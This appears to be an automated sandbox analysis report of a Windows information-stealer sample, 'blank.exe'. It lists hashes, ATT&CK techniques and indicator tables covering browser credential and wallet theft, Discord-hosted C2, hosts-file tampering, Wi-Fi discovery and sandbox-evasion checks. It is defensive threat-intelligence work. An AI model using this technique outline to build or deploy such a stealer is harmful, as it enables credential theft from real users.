7690f96c2c52dae73c9d1e941f3f2fea3350664b8074e0958f64cc704c65527b

Analysis

max time kernel
566s
max time network
601s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
01-01-2025 17:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

blank.exe
Size

6.9MB
MD5

feae9beea405e210c9734b7c682a9fb4
SHA1

0a7cc64b5255b58752f81869dc4ef84a95cd8df5
SHA256

7690f96c2c52dae73c9d1e941f3f2fea3350664b8074e0958f64cc704c65527b
SHA512

354524a145d20751455c91d3a7a4ce5cdb40bae220f77fdc199fcbc90c48568ea9b20db72bde694e687d395fa0a66fd61eab5910f4ea2d8fa981462a712a1e1d
SSDEEP

98304:6ADjWM8JEE1FbamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRiYRJJcGhEIFWv:6A0seNTfm/pf+xk4dWRimrbW3jmyh

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2780	powershell.exe
3156	powershell.exe
2468	powershell.exe
4780	powershell.exe
2056	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	blank.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2256	cmd.exe
1840	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4784	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
5080	blank.exe
5080	blank.exe
5080	blank.exe
5080	blank.exe
5080	blank.exe
5080	blank.exe
5080	blank.exe
5080	blank.exe
5080	blank.exe
5080	blank.exe
5080	blank.exe
5080	blank.exe
5080	blank.exe
5080	blank.exe
5080	blank.exe
5080	blank.exe
5080	blank.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
30	discord.com
29	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	ip-api.com
15	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
3908	tasklist.exe
4136	tasklist.exe
1564	tasklist.exe
2416	tasklist.exe
3632	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1852	cmd.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a000000023b95-21.dat	upx
behavioral1/memory/5080-25-0x00007FFD82850000-0x00007FFD82E38000-memory.dmp	upx
behavioral1/files/0x000a000000023b88-27.dat	upx
behavioral1/files/0x000a000000023b93-29.dat	upx
behavioral1/memory/5080-48-0x00007FFD96F80000-0x00007FFD96F8F000-memory.dmp	upx
behavioral1/files/0x000a000000023b8f-47.dat	upx
behavioral1/files/0x000a000000023b8e-46.dat	upx
behavioral1/files/0x000a000000023b8d-45.dat	upx
behavioral1/files/0x000a000000023b8c-44.dat	upx
behavioral1/files/0x000a000000023b8b-43.dat	upx
behavioral1/files/0x000a000000023b8a-42.dat	upx
behavioral1/files/0x000a000000023b89-41.dat	upx
behavioral1/files/0x000a000000023b87-40.dat	upx
behavioral1/files/0x000a000000023b9a-39.dat	upx
behavioral1/files/0x000a000000023b99-38.dat	upx
behavioral1/files/0x000a000000023b98-37.dat	upx
behavioral1/files/0x000a000000023b94-34.dat	upx
behavioral1/files/0x000a000000023b92-33.dat	upx
behavioral1/memory/5080-30-0x00007FFD952C0000-0x00007FFD952E4000-memory.dmp	upx
behavioral1/memory/5080-54-0x00007FFD91A00000-0x00007FFD91A2D000-memory.dmp	upx
behavioral1/memory/5080-56-0x00007FFD96EB0000-0x00007FFD96EC9000-memory.dmp	upx
behavioral1/memory/5080-58-0x00007FFD919D0000-0x00007FFD919F3000-memory.dmp	upx
behavioral1/memory/5080-60-0x00007FFD82610000-0x00007FFD82783000-memory.dmp	upx
behavioral1/memory/5080-62-0x00007FFD919B0000-0x00007FFD919C9000-memory.dmp	upx
behavioral1/memory/5080-70-0x00007FFD81F20000-0x00007FFD81FD8000-memory.dmp	upx
behavioral1/memory/5080-73-0x00007FFD91980000-0x00007FFD919AE000-memory.dmp	upx
behavioral1/memory/5080-78-0x00007FFD91C00000-0x00007FFD91C0D000-memory.dmp	upx
behavioral1/memory/5080-80-0x00007FFD81A80000-0x00007FFD81B9C000-memory.dmp	upx
behavioral1/memory/5080-68-0x00007FFD82850000-0x00007FFD82E38000-memory.dmp	upx
behavioral1/memory/5080-76-0x00007FFD8D9D0000-0x00007FFD8D9E4000-memory.dmp	upx
behavioral1/memory/5080-75-0x00007FFD952C0000-0x00007FFD952E4000-memory.dmp	upx
behavioral1/memory/5080-71-0x00007FFD81BA0000-0x00007FFD81F15000-memory.dmp	upx
behavioral1/memory/5080-69-0x00007FFD91D50000-0x00007FFD91D5D000-memory.dmp	upx
behavioral1/memory/5080-100-0x00007FFD91A00000-0x00007FFD91A2D000-memory.dmp	upx
behavioral1/memory/5080-121-0x00007FFD919D0000-0x00007FFD919F3000-memory.dmp	upx
behavioral1/memory/5080-162-0x00007FFD82610000-0x00007FFD82783000-memory.dmp	upx
behavioral1/memory/5080-185-0x00007FFD919B0000-0x00007FFD919C9000-memory.dmp	upx
behavioral1/memory/5080-236-0x00007FFD81F20000-0x00007FFD81FD8000-memory.dmp	upx
behavioral1/memory/5080-241-0x00007FFD81BA0000-0x00007FFD81F15000-memory.dmp	upx
behavioral1/memory/5080-269-0x00007FFD91980000-0x00007FFD919AE000-memory.dmp	upx
behavioral1/memory/5080-276-0x00007FFD952C0000-0x00007FFD952E4000-memory.dmp	upx
behavioral1/memory/5080-289-0x00007FFD81A80000-0x00007FFD81B9C000-memory.dmp	upx
behavioral1/memory/5080-281-0x00007FFD82610000-0x00007FFD82783000-memory.dmp	upx
behavioral1/memory/5080-275-0x00007FFD82850000-0x00007FFD82E38000-memory.dmp	upx
behavioral1/memory/5080-321-0x00007FFD82850000-0x00007FFD82E38000-memory.dmp	upx
behavioral1/memory/5080-336-0x00007FFD82850000-0x00007FFD82E38000-memory.dmp	upx
behavioral1/memory/5080-354-0x00007FFD91980000-0x00007FFD919AE000-memory.dmp	upx
behavioral1/memory/5080-361-0x00007FFD81BA0000-0x00007FFD81F15000-memory.dmp	upx
behavioral1/memory/5080-360-0x00007FFD81F20000-0x00007FFD81FD8000-memory.dmp	upx
behavioral1/memory/5080-359-0x00007FFD91D50000-0x00007FFD91D5D000-memory.dmp	upx
behavioral1/memory/5080-358-0x00007FFD919B0000-0x00007FFD919C9000-memory.dmp	upx
behavioral1/memory/5080-357-0x00007FFD82610000-0x00007FFD82783000-memory.dmp	upx
behavioral1/memory/5080-356-0x00007FFD919D0000-0x00007FFD919F3000-memory.dmp	upx
behavioral1/memory/5080-355-0x00007FFD96EB0000-0x00007FFD96EC9000-memory.dmp	upx
behavioral1/memory/5080-353-0x00007FFD96F80000-0x00007FFD96F8F000-memory.dmp	upx
behavioral1/memory/5080-352-0x00007FFD952C0000-0x00007FFD952E4000-memory.dmp	upx
behavioral1/memory/5080-351-0x00007FFD91A00000-0x00007FFD91A2D000-memory.dmp	upx
behavioral1/memory/5080-350-0x00007FFD81A80000-0x00007FFD81B9C000-memory.dmp	upx
behavioral1/memory/5080-349-0x00007FFD91C00000-0x00007FFD91C0D000-memory.dmp	upx
behavioral1/memory/5080-348-0x00007FFD8D9D0000-0x00007FFD8D9E4000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4088	cmd.exe
5016	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4964	cmd.exe
2128	netsh.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1076	WMIC.exe
1556	WMIC.exe
1940	WMIC.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1324	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133802252912979826"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "8"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe1000000050ef5e839818db01ba400789a518db0112d334c3705cdb0114000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5016	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2780	powershell.exe
4780	powershell.exe
2780	powershell.exe
2780	powershell.exe
4780	powershell.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2056	powershell.exe
2056	powershell.exe
2660	taskmgr.exe
1840	powershell.exe
1840	powershell.exe
2660	taskmgr.exe
2660	taskmgr.exe
1840	powershell.exe
4360	powershell.exe
4360	powershell.exe
4360	powershell.exe
2660	taskmgr.exe
2660	taskmgr.exe
3156	powershell.exe
3156	powershell.exe
2716	powershell.exe
2716	powershell.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2468	powershell.exe
2468	powershell.exe
2660	taskmgr.exe
2068	powershell.exe
2068	powershell.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs

pid	Process
1228	chrome.exe
1228	chrome.exe
1228	chrome.exe
1228	chrome.exe
1228	chrome.exe
3056	msedge.exe
3056	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3632	tasklist.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	4780	powershell.exe
Token: SeIncreaseQuotaPrivilege	4556	WMIC.exe
Token: SeSecurityPrivilege	4556	WMIC.exe
Token: SeTakeOwnershipPrivilege	4556	WMIC.exe
Token: SeLoadDriverPrivilege	4556	WMIC.exe
